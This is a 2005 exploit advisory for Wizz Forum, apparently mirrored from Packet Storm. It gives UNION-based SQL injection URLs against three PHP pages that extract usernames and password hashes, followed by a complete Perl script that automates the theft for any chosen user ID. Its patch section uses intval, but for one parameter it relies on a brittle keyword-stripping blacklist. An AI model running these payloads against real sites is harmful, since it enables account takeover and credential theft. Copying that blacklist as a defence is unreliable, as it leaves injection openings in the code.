Lucene search

K

wizzSQL.txt

🗓️ 15 Nov 2005 00:00:00Reported by HACKERS PALType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 43 Views

SQL injections in Wizz Forum discovered by HACKERS PAL, including specific file exploits, and instructions to protect against the attacks

Show more
Code
`Hello,,  
  
Multible Sql injections in Wizz Forum ,,  
  
Discovered by : HACKERS PAL  
  
Thanks For :: DeviL-00 - Abducter(Abducter_Minds) - almaster  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
  
file : ForumAuthDetails.php  
ForumAuthDetails.php?AuthID=-4654'%20union%20select%20password,userid,password,userid,5,6,7,"http://www.sqor.net",lastlogin,lastlogin,lastlogin,5465465464,8979878745%20from%20ForumUser%20where%20user_index=1  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
  
file : ForumTopicDetails.php  
ForumTopicDetails.php?TopicID=-10%20union%20select%201,userid,password,userid,joindate,4444444,4444444%20from%20ForumUser%20where%20user_index=1  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
  
file : ForumReply.php  
username  
ForumReply.php?TopicID=-10%20union%20select%201,userid,3,4,5,6,7%20from%20ForumUser%20where%20user_index=1  
password  
ForumReply.php?TopicID=-10%20union%20select%201,password,3,4,5,6,7%20from%20ForumUser%20where%20user_index=1  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
  
How To Protect ..  
  
open ForumTopicDetails.php  
on line 28 After [ if (mysql_select_db ($MySQLDatabasename)) { ]  
add : $TopicID=intval($_GET['TopicID']);  
  
open ForumReply.php  
on line 46 After [ if (mysql_select_db ($MySQLDatabasename)) { ]  
add : $TopicID=intval($_GET['TopicID']);  
  
open ForumAuthDetails.php  
on line 28 : after [ if (mysql_select_db ($MySQLDatabasename)) { ]  
add :-  
$AuthID=addslashes(htmlspecialchars($_GET['AuthID']));  
$AuthID=str_replace(",","",$AuthID);  
$AuthID=str_replace("'","",$AuthID);  
$AuthID=str_replace('"',"",$AuthID);  
$AuthID=str_replace("password","",$AuthID);  
$AuthID=str_replace("user","",$AuthID);  
$AuthID=str_replace("id","",$AuthID);  
  
  
exploit :-  
#!/bin/env perl  
#//-----------------------------------------------------------#  
#// Wizz Forum SQL Injection Exploit .. By HACKERS PAL  
#// Greets For Devil-00 - Abducter - Almaster  
#// http://WwW.SoQoR.NeT  
#//-----------------------------------------------------------#  
  
use LWP::Simple;  
  
print "\n#####################################################";  
print "\n# Wizz Forum Exploit By : HACKERS PAL #";  
print "\n# Http://WwW.SoQoR.NeT #";  
  
if(!$ARGV[0] or !$ARGV[1]) {  
print "\n# -- Usage: #";  
print "\n# -- perl $0 [Full-Path] [User ID] #";  
print "\n# -- Example: #";  
print "\n# -- perl $0 http://vubb.com/forum/1 #";  
print "\n# Greets To Devil-00 - Abducter - almastar #";  
print "\n#####################################################";  
exit(0);  
}  
else  
{  
print "\n# Greets To Devil-00 - Abducter - almastar #";  
print "\n#####################################################";  
  
$web=$ARGV[0];  
$id=$ARGV[1];  
$url = "ForumTopicDetails.php?TopicID=-10%20union%20select%20userid,password,password,userid,joindate,4444444,4444444%20from%20ForumUser%20where%20user_index=$id";  
$site="$web/$url";  
$page = get($site) || die "[-] Unable to retrieve: $!";  
print "\n[+] Connected to: $ARGV[0]\n";  
  
print "[+] User ID is : $id ";  
$page =~ m/<td width='100%' colspan='3'><font face='Arial' size='2'>(.*?)<\/font><\/td>/ && print "\n[+] User Name is: $1\n";  
print "\n[-] Unable to retrieve User Name\n" if(!$1);  
$page =~ m/<font face='Arial' size='4'>Topic: (.*?)<\/font>/ && print "[+] MD5 hash of password is: $1\n";  
print "[-] Unable to retrieve hash of password\n" if(!$1);  
  
}  
  
# Finished  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo